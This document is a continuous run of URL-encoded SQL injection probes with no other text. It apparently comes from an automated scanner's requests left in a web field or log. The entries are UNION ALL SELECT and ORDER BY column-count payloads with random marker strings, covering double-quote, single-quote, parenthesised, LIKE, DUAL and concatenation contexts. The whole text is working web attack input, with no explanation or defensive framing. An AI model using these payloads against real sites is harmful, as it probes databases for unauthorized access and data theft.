-4292%22%29%20UNION%20ALL%20SELECT%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%23%20AND%20%28%22kOww%22%3D%22kOww -1338%22%29%20UNION%20ALL%20SELECT%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%2C%201990%23%20AND%20%28%22fWry%22%3D%22fWry -1362%22%29%20UNION%20ALL%20SELECT%209111%2C%209111%2C%209111%2C%209111%2C%209111%2C%209111%2C%209111%2C%209111%2C%209111%2C%209111%23%20AND%20%28%22QdBR%22%3D%22QdBR -3195%22%29%29%20ORDER%20BY%201%23%20AND%20%28%28%22AbjJ%22%3D%22AbjJ -5950%22%29%29%20ORDER%20BY%208312%23%20AND%20%28%28%22flxi%22%3D%22flxi -2406%22%29%29%20UNION%20ALL%20SELECT%207495%23%20AND%20%28%28%22sTpb%22%3D%22sTpb -7386%22%29%29%20UNION%20ALL%20SELECT%205719%2C%205719%23%20AND%20%28%28%22rwxZ%22%3D%22rwxZ -3074%22%29%29%20UNION%20ALL%20SELECT%202073%2C%202073%2C%202073%23%20AND%20%28%28%22NsTU%22%3D%22NsTU -3407%22%29%29%20UNION%20ALL%20SELECT%208299%2C%208299%2C%208299%2C%208299%23%20AND%20%28%28%22qXEn%22%3D%22qXEn -2983%22%29%29%20UNION%20ALL%20SELECT%206863%2C%206863%2C%206863%2C%206863%2C%206863%23%20AND%20%28%28%22cABn%22%3D%22cABn -9195%22%29%29%20UNION%20ALL%20SELECT%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%23%20AND%20%28%28%22VxiS%22%3D%22VxiS -8103%22%29%29%20UNION%20ALL%20SELECT%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%2C%202382%23%20AND%20%28%28%22ZWJv%22%3D%22ZWJv -6572%22%29%29%20UNION%20ALL%20SELECT%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%23%20AND%20%28%28%22zOdH%22%3D%22zOdH -6256%22%29%29%20UNION%20ALL%20SELECT%207423%2C%207423%2C%207423%2C%207423%2C%207423%2C%207423%2C%207423%2C%207423%2C%207423%23%20AND%20%28%28%22PBKG%22%3D%22PBKG -4317%22%29%29%20UNION%20ALL%20SELECT%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%2C%208364%23%20AND%20%28%28%22ChcR%22%3D%22ChcR -9519%22%29%29%29%20ORDER%20BY%201%23%20AND%20%28%28%28%22OjNI%22%3D%22OjNI -1234%22%29%29%29%20ORDER%20BY%202644%23%20AND%20%28%28%28%22bZzy%22%3D%22bZzy -4237%22%29%29%29%20UNION%20ALL%20SELECT%207008%23%20AND%20%28%28%28%22KeLw%22%3D%22KeLw -3136%22%29%29%29%20UNION%20ALL%20SELECT%207710%2C%207710%23%20AND%20%28%28%28%22lpku%22%3D%22lpku -2591%22%29%29%29%20UNION%20ALL%20SELECT%203904%2C%203904%2C%203904%23%20AND%20%28%28%28%22JPDI%22%3D%22JPDI -9216%22%29%29%29%20UNION%20ALL%20SELECT%208264%2C%208264%2C%208264%2C%208264%23%20AND%20%28%28%28%22jSIi%22%3D%22jSIi -1965%22%29%29%29%20UNION%20ALL%20SELECT%204563%2C%204563%2C%204563%2C%204563%2C%204563%23%20AND%20%28%28%28%22INmg%22%3D%22INmg -5358%22%29%29%29%20UNION%20ALL%20SELECT%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%23%20AND%20%28%28%28%22rxMY%22%3D%22rxMY -5535%22%29%29%29%20UNION%20ALL%20SELECT%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%23%20AND%20%28%28%28%22ZCpg%22%3D%22ZCpg -3149%22%29%29%29%20UNION%20ALL%20SELECT%204261%2C%204261%2C%204261%2C%204261%2C%204261%2C%204261%2C%204261%2C%204261%23%20AND%20%28%28%28%22jQXO%22%3D%22jQXO -7687%22%29%29%29%20UNION%20ALL%20SELECT%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%2C%203108%23%20AND%20%28%28%28%22laEW%22%3D%22laEW -1233%22%29%29%29%20UNION%20ALL%20SELECT%201942%2C%201942%2C%201942%2C%201942%2C%201942%2C%201942%2C%201942%2C%201942%2C%201942%2C%201942%23%20AND%20%28%28%28%22QAyg%22%3D%22QAyg -3840%22%20ORDER%20BY%201%23%20AND%20%22arkG%22%3D%22arkG -6452%22%20ORDER%20BY%209822%23%20AND%20%22SdAS%22%3D%22SdAS -4634%22%20UNION%20ALL%20SELECT%206745%23%20AND%20%22sodH%22%3D%22sodH -5407%22%20UNION%20ALL%20SELECT%203244%2C%203244%23%20AND%20%22TAxQ%22%3D%22TAxQ -1129%22%20UNION%20ALL%20SELECT%209034%2C%209034%2C%209034%23%20AND%20%22RROF%22%3D%22RROF -6795%22%20UNION%20ALL%20SELECT%205047%2C%205047%2C%205047%2C%205047%23%20AND%20%22bKSn%22%3D%22bKSn -3498%22%20UNION%20ALL%20SELECT%203791%2C%203791%2C%203791%2C%203791%2C%203791%23%20AND%20%22VelH%22%3D%22VelH -3389%22%20UNION%20ALL%20SELECT%208355%2C%208355%2C%208355%2C%208355%2C%208355%2C%208355%23%20AND%20%22yGbB%22%3D%22yGbB -3479%22%20UNION%20ALL%20SELECT%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%23%20AND%20%22udep%22%3D%22udep -2432%22%20UNION%20ALL%20SELECT%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%2C%201346%23%20AND%20%22Nssm%22%3D%22Nssm -8194%22%20UNION%20ALL%20SELECT%202901%2C%202901%2C%202901%2C%202901%2C%202901%2C%202901%2C%202901%2C%202901%2C%202901%23%20AND%20%22cnhO%22%3D%22cnhO -1603%22%20UNION%20ALL%20SELECT%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%23%20AND%20%22yFmZ%22%3D%22yFmZ -5372%22%29%20ORDER%20BY%201%23%20AND%20%28%22NMEj%22%20LIKE%20%22NMEj -9359%22%29%20ORDER%20BY%205459%23%20AND%20%28%22GznR%22%20LIKE%20%22GznR -9753%22%29%20UNION%20ALL%20SELECT%203048%23%20AND%20%28%22bcFn%22%20LIKE%20%22bcFn -4103%22%29%20UNION%20ALL%20SELECT%207095%2C%207095%23%20AND%20%28%22VUDE%22%20LIKE%20%22VUDE -1264%22%29%20UNION%20ALL%20SELECT%207750%2C%207750%2C%207750%23%20AND%20%28%22sQsJ%22%20LIKE%20%22sQsJ -2924%22%29%20UNION%20ALL%20SELECT%203798%2C%203798%2C%203798%2C%203798%23%20AND%20%28%22AuKN%22%20LIKE%20%22AuKN -6323%22%29%20UNION%20ALL%20SELECT%201961%2C%201961%2C%201961%2C%201961%2C%201961%23%20AND%20%28%22uVDb%22%20LIKE%20%22uVDb -8510%22%29%20UNION%20ALL%20SELECT%208955%2C%208955%2C%208955%2C%208955%2C%208955%2C%208955%23%20AND%20%28%22qaXe%22%20LIKE%20%22qaXe -7107%22%29%20UNION%20ALL%20SELECT%206147%2C%206147%2C%206147%2C%206147%2C%206147%2C%206147%2C%206147%23%20AND%20%28%22gyEc%22%20LIKE%20%22gyEc -3982%22%29%20UNION%20ALL%20SELECT%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%2C%202089%23%20AND%20%28%22HxwR%22%20LIKE%20%22HxwR -5271%22%29%20UNION%20ALL%20SELECT%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%2C%208030%23%20AND%20%28%22EYVN%22%20LIKE%20%22EYVN -9870%22%29%20UNION%20ALL%20SELECT%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%2C%202350%23%20AND%20%28%22TMew%22%20LIKE%20%22TMew -1121%22%29%29%20ORDER%20BY%201%23%20AND%20%28%28%22xzwl%22%20LIKE%20%22xzwl -7537%22%29%29%20ORDER%20BY%206669%23%20AND%20%28%28%22uWUR%22%20LIKE%20%22uWUR -8825%22%29%29%20UNION%20ALL%20SELECT%202224%23%20AND%20%28%28%22ekLS%22%20LIKE%20%22ekLS -5416%22%29%29%20UNION%20ALL%20SELECT%202133%2C%202133%23%20AND%20%28%28%22vsYv%22%20LIKE%20%22vsYv -3086%22%29%29%20UNION%20ALL%20SELECT%203218%2C%203218%2C%203218%23%20AND%20%28%28%22YrGM%22%20LIKE%20%22YrGM -2752%22%29%29%20UNION%20ALL%20SELECT%206496%2C%206496%2C%206496%2C%206496%23%20AND%20%28%28%22TllH%22%20LIKE%20%22TllH -2221%22%29%29%20UNION%20ALL%20SELECT%202876%2C%202876%2C%202876%2C%202876%2C%202876%23%20AND%20%28%28%22LWsx%22%20LIKE%20%22LWsx -7698%22%29%29%20UNION%20ALL%20SELECT%209859%2C%209859%2C%209859%2C%209859%2C%209859%2C%209859%23%20AND%20%28%28%22SLkh%22%20LIKE%20%22SLkh -5364%22%29%29%20UNION%20ALL%20SELECT%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%23%20AND%20%28%28%22DLwj%22%20LIKE%20%22DLwj -3108%22%29%29%20UNION%20ALL%20SELECT%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%2C%208011%23%20AND%20%28%28%22TebO%22%20LIKE%20%22TebO -7386%22%29%29%20UNION%20ALL%20SELECT%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%2C%203351%23%20AND%20%28%28%22JCst%22%20LIKE%20%22JCst -9993%22%29%29%20UNION%20ALL%20SELECT%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%2C%208078%23%20AND%20%28%28%22NISk%22%20LIKE%20%22NISk -5722%22%29%29%29%20ORDER%20BY%201%23%20AND%20%28%28%28%22ILWh%22%20LIKE%20%22ILWh -8577%22%29%29%29%20ORDER%20BY%207200%23%20AND%20%28%28%28%22ZAOd%22%20LIKE%20%22ZAOd -4013%22%29%29%29%20UNION%20ALL%20SELECT%208840%23%20AND%20%28%28%28%22iLQy%22%20LIKE%20%22iLQy -4150%22%29%29%29%20UNION%20ALL%20SELECT%204106%2C%204106%23%20AND%20%28%28%28%22BGfN%22%20LIKE%20%22BGfN -3601%22%29%29%29%20UNION%20ALL%20SELECT%201647%2C%201647%2C%201647%23%20AND%20%28%28%28%22IRtr%22%20LIKE%20%22IRtr -1660%22%29%29%29%20UNION%20ALL%20SELECT%203033%2C%203033%2C%203033%2C%203033%23%20AND%20%28%28%28%22zUEr%22%20LIKE%20%22zUEr -9959%22%29%29%29%20UNION%20ALL%20SELECT%204551%2C%204551%2C%204551%2C%204551%2C%204551%23%20AND%20%28%28%28%22sfqt%22%20LIKE%20%22sfqt -4613%22%29%29%29%20UNION%20ALL%20SELECT%204073%2C%204073%2C%204073%2C%204073%2C%204073%2C%204073%23%20AND%20%28%28%28%22HhtF%22%20LIKE%20%22HhtF -7004%22%29%29%29%20UNION%20ALL%20SELECT%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%2C%208698%23%20AND%20%28%28%28%22OhCY%22%20LIKE%20%22OhCY -8803%22%29%29%29%20UNION%20ALL%20SELECT%206002%2C%206002%2C%206002%2C%206002%2C%206002%2C%206002%2C%206002%2C%206002%23%20AND%20%28%28%28%22CuyY%22%20LIKE%20%22CuyY -6500%22%29%29%29%20UNION%20ALL%20SELECT%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%23%20AND%20%28%28%28%22Bxpr%22%20LIKE%20%22Bxpr -4490%22%29%29%29%20UNION%20ALL%20SELECT%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%2C%207260%23%20AND%20%28%28%28%22GLoj%22%20LIKE%20%22GLoj -8555%22%20ORDER%20BY%201%23%20AND%20%22tIjh%22%20LIKE%20%22tIjh -3035%22%20ORDER%20BY%206008%23%20AND%20%22GmMc%22%20LIKE%20%22GmMc -1706%22%20UNION%20ALL%20SELECT%204338%23%20AND%20%22HWaw%22%20LIKE%20%22HWaw -2770%22%20UNION%20ALL%20SELECT%203910%2C%203910%23%20AND%20%22IMFJ%22%20LIKE%20%22IMFJ -5103%22%20UNION%20ALL%20SELECT%208756%2C%208756%2C%208756%23%20AND%20%22ngHv%22%20LIKE%20%22ngHv -6802%22%20UNION%20ALL%20SELECT%203873%2C%203873%2C%203873%2C%203873%23%20AND%20%22iCaP%22%20LIKE%20%22iCaP -9497%22%20UNION%20ALL%20SELECT%204525%2C%204525%2C%204525%2C%204525%2C%204525%23%20AND%20%22UdUH%22%20LIKE%20%22UdUH -4276%22%20UNION%20ALL%20SELECT%201093%2C%201093%2C%201093%2C%201093%2C%201093%2C%201093%23%20AND%20%22cffZ%22%20LIKE%20%22cffZ -6551%22%20UNION%20ALL%20SELECT%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%2C%206978%23%20AND%20%22iKyS%22%20LIKE%20%22iKyS -1756%22%20UNION%20ALL%20SELECT%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%2C%208392%23%20AND%20%22wKrf%22%20LIKE%20%22wKrf -9169%22%20UNION%20ALL%20SELECT%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%2C%202311%23%20AND%20%22nLPJ%22%20LIKE%20%22nLPJ -2220%22%20UNION%20ALL%20SELECT%201003%2C%201003%2C%201003%2C%201003%2C%201003%2C%201003%2C%201003%2C%201003%2C%201003%2C%201003%23%20AND%20%22JIQE%22%20LIKE%20%22JIQE -5833%29%20WHERE%207247%3D7247%20ORDER%20BY%201%23 -4504%29%20WHERE%207906%3D7906%20ORDER%20BY%201235%23 -3051%29%20WHERE%208530%3D8530%20UNION%20ALL%20SELECT%208530%23 -5157%29%20WHERE%206920%3D6920%20UNION%20ALL%20SELECT%206920%2C%206920%23 -6859%29%20WHERE%202993%3D2993%20UNION%20ALL%20SELECT%202993%2C%202993%2C%202993%23 -2445%29%20WHERE%208103%3D8103%20UNION%20ALL%20SELECT%208103%2C%208103%2C%208103%2C%208103%23 -4827%29%20WHERE%201449%3D1449%20UNION%20ALL%20SELECT%201449%2C%201449%2C%201449%2C%201449%2C%201449%23 -1452%29%20WHERE%206042%3D6042%20UNION%20ALL%20SELECT%206042%2C%206042%2C%206042%2C%206042%2C%206042%2C%206042%23 -7086%29%20WHERE%205732%3D5732%20UNION%20ALL%20SELECT%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%2C%205732%23 -9734%29%20WHERE%208911%3D8911%20UNION%20ALL%20SELECT%208911%2C%208911%2C%208911%2C%208911%2C%208911%2C%208911%2C%208911%2C%208911%23 -2577%29%20WHERE%204983%3D4983%20UNION%20ALL%20SELECT%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%23 -3366%29%20WHERE%206880%3D6880%20UNION%20ALL%20SELECT%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%2C%206880%23 -5435%27%29%20WHERE%205912%3D5912%20ORDER%20BY%201%23 -7264%27%29%20WHERE%204018%3D4018%20ORDER%20BY%206533%23 -5412%27%29%20WHERE%201068%3D1068%20UNION%20ALL%20SELECT%201068%23 -8173%27%29%20WHERE%209905%3D9905%20UNION%20ALL%20SELECT%209905%2C%209905%23 -7640%27%29%20WHERE%207644%3D7644%20UNION%20ALL%20SELECT%207644%2C%207644%2C%207644%23 -2548%27%29%20WHERE%206187%3D6187%20UNION%20ALL%20SELECT%206187%2C%206187%2C%206187%2C%206187%23 -9402%27%29%20WHERE%207836%3D7836%20UNION%20ALL%20SELECT%207836%2C%207836%2C%207836%2C%207836%2C%207836%23 -3022%27%29%20WHERE%204334%3D4334%20UNION%20ALL%20SELECT%204334%2C%204334%2C%204334%2C%204334%2C%204334%2C%204334%23 -6961%27%29%20WHERE%209966%3D9966%20UNION%20ALL%20SELECT%209966%2C%209966%2C%209966%2C%209966%2C%209966%2C%209966%2C%209966%23 -8441%27%29%20WHERE%205972%3D5972%20UNION%20ALL%20SELECT%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%23 -3865%27%29%20WHERE%206391%3D6391%20UNION%20ALL%20SELECT%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%23 -5546%27%29%20WHERE%204647%3D4647%20UNION%20ALL%20SELECT%204647%2C%204647%2C%204647%2C%204647%2C%204647%2C%204647%2C%204647%2C%204647%2C%204647%2C%204647%23 -7470%27%20WHERE%206642%3D6642%20ORDER%20BY%201%23 -9834%27%20WHERE%207386%3D7386%20ORDER%20BY%209370%23 -6896%27%20WHERE%207519%3D7519%20UNION%20ALL%20SELECT%207519%23 -8852%27%20WHERE%202014%3D2014%20UNION%20ALL%20SELECT%202014%2C%202014%23 -9247%27%20WHERE%208119%3D8119%20UNION%20ALL%20SELECT%208119%2C%208119%2C%208119%23 -7753%27%20WHERE%206020%3D6020%20UNION%20ALL%20SELECT%206020%2C%206020%2C%206020%2C%206020%23 -7848%27%20WHERE%206149%3D6149%20UNION%20ALL%20SELECT%206149%2C%206149%2C%206149%2C%206149%2C%206149%23 -3688%27%20WHERE%204211%3D4211%20UNION%20ALL%20SELECT%204211%2C%204211%2C%204211%2C%204211%2C%204211%2C%204211%23 -1052%27%20WHERE%209468%3D9468%20UNION%20ALL%20SELECT%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%2C%209468%23 -5777%27%20WHERE%207790%3D7790%20UNION%20ALL%20SELECT%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%2C%207790%23 -4520%27%20WHERE%206973%3D6973%20UNION%20ALL%20SELECT%206973%2C%206973%2C%206973%2C%206973%2C%206973%2C%206973%2C%206973%2C%206973%2C%206973%23 -6700%27%20WHERE%201248%3D1248%20UNION%20ALL%20SELECT%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%23 -7827%22%20WHERE%201080%3D1080%20ORDER%20BY%201%23 -7874%22%20WHERE%209627%3D9627%20ORDER%20BY%203855%23 -9277%22%20WHERE%201716%3D1716%20UNION%20ALL%20SELECT%201716%23 -5984%22%20WHERE%208781%3D8781%20UNION%20ALL%20SELECT%208781%2C%208781%23 -5109%22%20WHERE%205286%3D5286%20UNION%20ALL%20SELECT%205286%2C%205286%2C%205286%23 -5190%22%20WHERE%203333%3D3333%20UNION%20ALL%20SELECT%203333%2C%203333%2C%203333%2C%203333%23 -3629%22%20WHERE%203018%3D3018%20UNION%20ALL%20SELECT%203018%2C%203018%2C%203018%2C%203018%2C%203018%23 -7913%22%20WHERE%205308%3D5308%20UNION%20ALL%20SELECT%205308%2C%205308%2C%205308%2C%205308%2C%205308%2C%205308%23 -2573%22%20WHERE%201855%3D1855%20UNION%20ALL%20SELECT%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%2C%201855%23 -4885%22%20WHERE%201131%3D1131%20UNION%20ALL%20SELECT%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%2C%201131%23 -8248%22%20WHERE%203227%3D3227%20UNION%20ALL%20SELECT%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%2C%203227%23 -4485%22%20WHERE%201050%3D1050%20UNION%20ALL%20SELECT%201050%2C%201050%2C%201050%2C%201050%2C%201050%2C%201050%2C%201050%2C%201050%2C%201050%2C%201050%23 -7029%27%20%7C%7C%20%28SELECT%206821%20FROM%20DUAL%20WHERE%206227%3D6227%20ORDER%20BY%201%23%20%29%20%7C%7C%20%27 -1283%27%20%7C%7C%20%28SELECT%208997%20FROM%20DUAL%20WHERE%206344%3D6344%20ORDER%20BY%206662%23%20%29%20%7C%7C%20%27 -1868%27%20%7C%7C%20%28SELECT%208853%20FROM%20DUAL%20WHERE%205319%3D5319%20UNION%20ALL%20SELECT%205319%23%20%29%20%7C%7C%20%27 -9430%27%20%7C%7C%20%28SELECT%208468%20FROM%20DUAL%20WHERE%204979%3D4979%20UNION%20ALL%20SELECT%204979%2C%204979%23%20%29%20%7C%7C%20%27 -4077%27%20%7C%7C%20%28SELECT%202451%20FROM%20DUAL%20WHERE%203825%3D3825%20UNION%20ALL%20SELECT%203825%2C%203825%2C%203825%23%20%29%20%7C%7C%20%27 -5169%27%20%7C%7C%20%28SELECT%202419%20FROM%20DUAL%20WHERE%202408%3D2408%20UNION%20ALL%20SELECT%202408%2C%202408%2C%202408%2C%202408%23%20%29%20%7C%7C%20%27 -8618%27%20%7C%7C%20%28SELECT%207328%20FROM%20DUAL%20WHERE%205522%3D5522%20UNION%20ALL%20SELECT%205522%2C%205522%2C%205522%2C%205522%2C%205522%23%20%29%20%7C%7C%20%27 -6058%27%20%7C%7C%20%28SELECT%203933%20FROM%20DUAL%20WHERE%209338%3D9338%20UNION%20ALL%20SELECT%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%23%20%29%20%7C%7C%20%27 -2416%27%20%7C%7C%20%28SELECT%201307%20FROM%20DUAL%20WHERE%208783%3D8783%20UNION%20ALL%20SELECT%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%23%20%29%20%7C%7C%20%27 -7803%27%20%7C%7C%20%28SELECT%201538%20FROM%20DUAL%20WHERE%207664%3D7664%20UNION%20ALL%20SELECT%207664%2C%207664%2C%207664%2C%207664%2C%207664%2C%207664%2C%207664%2C%207664%23%20%29%20%7C%7C%20%27 -7410%27%20%7C%7C%20%28SELECT%201661%20FROM%20DUAL%20WHERE%209580%3D9580%20UNION%20ALL%20SELECT%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%2C%209580%23%20%29%20%7C%7C%20%27 -9179%27%20%7C%7C%20%28SELECT%207861%20FROM%20DUAL%20WHERE%208196%3D8196%20UNION%20ALL%20SELECT%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%2C%208196%23%20%29%20%7C%7C%20%27 -4677%27%20%7C%7C%20%28SELECT%208472%20WHERE%204324%3D4324%20ORDER%20BY%201%23%20%29%20%7C%7C%20%27 -7513%27%20%7C%7C%20%28SELECT%203040%20WHERE%203052%3D3052%20ORDER%20BY%203822%23%20%29%20%7C%7C%20%27 -4420%27%20%7C%7C%20%28SELECT%209949%20WHERE%203812%3D3812%20UNION%20ALL%20SELECT%203812%23%20%29%20%7C%7C%20%27 -9585%27%20%7C%7C%20%28SELECT%208532%20WHERE%205791%3D5791%20UNION%20ALL%20SELECT%205791%2C%205791%23%20%29%20%7C%7C%20%27 -1996%27%20%7C%7C%20%28SELECT%202956%20WHERE%209392%3D9392%20UNION%20ALL%20SELECT%209392%2C%209392%2C%209392%23%20%29%20%7C%7C%20%27 -2121%27%20%7C%7C%20%28SELECT%209056%20WHERE%205650%3D5650%20UNION%20ALL%20SELECT%205650%2C%205650%2C%205650%2C%205650%23%20%29%20%7C%7C%20%27 -8740%27%20%7C%7C%20%28SELECT%205185%20WHERE%202156%3D2156%20UNION%20ALL%20SELECT%202156%2C%202156%2C%202156%2C%202156%2C%202156%23%20%29%20%7C%7C%20%27 -1419%27%20%7C%7C%20%28SELECT%204646%20WHERE%203030%3D3030%20UNION%20ALL%20SELECT%203030%2C%203030%2C%203030%2C%203030%2C%203030%2C%203030%23%20%29%20%7C%7C%20%27 -7292%27%20%7C%7C%20%28SELECT%207060%20WHERE%205490%3D5490%20UNION%20ALL%20SELECT%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%2C%205490%23%20%29%20%7C%7C%20%27 -8617%27%20%7C%7C%20%28SELECT%208596%20WHERE%202362%3D2362%20UNION%20ALL%20SELECT%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%23%20%29%20%7C%7C%20%27 -7238%27%20%7C%7C%20%28SELECT%201022%20WHERE%204612%3D4612%20UNION%20ALL%20SELECT%204612%2C%204612%2C%204612%2C%204612%2C%204612%2C%204612%2C%204612%2C%204612%2C%204612%23%20%29%20%7C%7C%20%27 -5835%27%20%7C%7C%20%28SELECT%209703%20WHERE%201145%3D1145%20UNION%20ALL%20SELECT%201145%2C%201145%2C%201145%2C%201145%2C%201145%2C%201145%2C%201145%2C%201145%2C%201145%2C%201145%23%20%29%20%7C%7C%20%27 -3199%20%2B%20%28SELECT%207581%20FROM%20DUAL%20WHERE%205434%3D5434%20ORDER%20BY%201%23%20%29 -4370%20%2B%20%28SELECT%202848%20FROM%20DUAL%20WHERE%206690%3D6690%20ORDER%20BY%204675%23%20%29 -9155%20%2B%20%28SELECT%203223%20FROM%20DUAL%20WHERE%205128%3D5128%20UNION%20ALL%20SELECT%205128%23%20%29 -5686%20%2B%20%28SELECT%209747%20FROM%20DUAL%20WHERE%201637%3D1637%20UNION%20ALL%20SELECT%201637%2C%201637%23%20%29 -6886%20%2B%20%28SELECT%203084%20FROM%20DUAL%20WHERE%206063%3D6063%20UNION%20ALL%20SELECT%206063%2C%206063%2C%206063%23%20%29 -5121%20%2B%20%28SELECT%203808%20FROM%20DUAL%20WHERE%209057%3D9057%20UNION%20ALL%20SELECT%209057%2C%209057%2C%209057%2C%209057%23%20%29 -4061%20%2B%20%28SELECT%205988%20FROM%20DUAL%20WHERE%204365%3D4365%20UNION%20ALL%20SELECT%204365%2C%204365%2C%204365%2C%204365%2C%204365%23%20%29 -6210%20%2B%20%28SELECT%209934%20FROM%20DUAL%20WHERE%208799%3D8799%20UNION%20ALL%20SELECT%208799%2C%208799%2C%208799%2C%208799%2C%208799%2C%208799%23%20%29 -8892%20%2B%20%28SELECT%209407%20FROM%20DUAL%20WHERE%205513%3D5513%20UNION%20ALL%20SELECT%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%23%20%29 -9268%20%2B%20%28SELECT%208494%20FROM%20DUAL%20WHERE%204227%3D4227%20UNION%20ALL%20SELECT%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%2C%204227%23%20%29 -8482%20%2B%20%28SELECT%202682%20FROM%20DUAL%20WHERE%206537%3D6537%20UNION%20ALL%20SELECT%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%23%20%29 -2091%20%2B%20%28SELECT%209859%20FROM%20DUAL%20WHERE%205000%3D5000%20UNION%20ALL%20SELECT%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%2C%205000%23%20%29 -5666%20%2B%20%28SELECT%207437%20WHERE%204235%3D4235%20ORDER%20BY%201%23%20%29 -3666%20%2B%20%28SELECT%202214%20WHERE%208489%3D8489%20ORDER%20BY%204233%23%20%29 -3669%20%2B%20%28SELECT%201316%20WHERE%204753%3D4753%20UNION%20ALL%20SELECT%204753%23%20%29 -8795%20%2B%20%28SELECT%206139%20WHERE%201187%3D1187%20UNION%20ALL%20SELECT%201187%2C%201187%23%20%29 -4026%20%2B%20%28SELECT%201312%20WHERE%201539%3D1539%20UNION%20ALL%20SELECT%201539%2C%201539%2C%201539%23%20%29 -1886%20%2B%20%28SELECT%205147%20WHERE%201319%3D1319%20UNION%20ALL%20SELECT%201319%2C%201319%2C%201319%2C%201319%23%20%29 -4901%20%2B%20%28SELECT%204798%20WHERE%205218%3D5218%20UNION%20ALL%20SELECT%205218%2C%205218%2C%205218%2C%205218%2C%205218%23%20%29 -5896%20%2B%20%28SELECT%206036%20WHERE%204877%3D4877%20UNION%20ALL%20SELECT%204877%2C%204877%2C%204877%2C%204877%2C%204877%2C%204877%23%20%29 -7894%20%2B%20%28SELECT%203307%20WHERE%206368%3D6368%20UNION%20ALL%20SELECT%206368%2C%206368%2C%206368%2C%206368%2C%206368%2C%206368%2C%206368%23%20%29 -5000%20%2B%20%28SELECT%201481%20WHERE%208827%3D8827%20UNION%20ALL%20SELECT%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%2C%208827%23%20%29 -7098%20%2B%20%28SELECT%203763%20WHERE%204734%3D4734%20UNION%20ALL%20SELECT%204734%2C%204734%2C%204734%2C%204734%2C%204734%2C%204734%2C%204734%2C%204734%2C%204734%23%20%29 -4719%20%2B%20%28SELECT%207329%20WHERE%204409%3D4409%20UNION%20ALL%20SELECT%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%23%20%29 -8742%27%20%2B%20%28SELECT%20%27bTcn%27%20FROM%20DUAL%20WHERE%203639%3D3639%20ORDER%20BY%201%23%20%29%20%2B%20%27 -2190%27%20%2B%20%28SELECT%20%27SHlL%27%20FROM%20DUAL%20WHERE%209000%3D9000%20ORDER%20BY%205444%23%20%29%20%2B%20%27 -5552%27%20%2B%20%28SELECT%20%27amCP%27%20FROM%20DUAL%20WHERE%205910%3D5910%20UNION%20ALL%20SELECT%205910%23%20%29%20%2B%20%27 -3820%27%20%2B%20%28SELECT%20%27nnUh%27%20FROM%20DUAL%20WHERE%203470%3D3470%20UNION%20ALL%20SELECT%203470%2C%203470%23%20%29%20%2B%20%27 -5144%27%20%2B%20%28SELECT%20%27wEjH%27%20FROM%20DUAL%20WHERE%206541%3D6541%20UNION%20ALL%20SELECT%206541%2C%206541%2C%206541%23%20%29%20%2B%20%27 